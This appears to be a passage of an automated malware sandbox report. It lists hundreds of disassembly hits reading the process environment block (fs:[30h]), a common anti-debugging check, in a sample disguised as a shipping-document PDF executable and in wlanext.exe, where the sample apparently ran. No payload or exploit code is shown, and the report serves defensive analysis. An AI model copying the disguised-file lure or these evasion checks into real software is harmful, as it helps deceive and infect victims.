      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E478D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E42A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4341E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E458DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4269A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4705AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4705AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00567C4F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00566CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005641FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005689EE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005689EB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00568A85 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D8B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03533B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03533B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035853CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035853CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352DBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03532397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035BD380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03511B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03511B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D5BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03534BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03534BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03534BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CEA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03594257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0354927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035BB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035BB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D8A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03505210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03505210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03505210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03505210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03523A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03518A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03544A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03544A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03532ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03532AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035941E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03532990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035361A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035361A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035869A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03520050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03520050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D1074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C2073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035040E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035040E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035040E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035058EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03583884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03583884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035490AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D8F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03504F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03504F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035437F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03518794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]
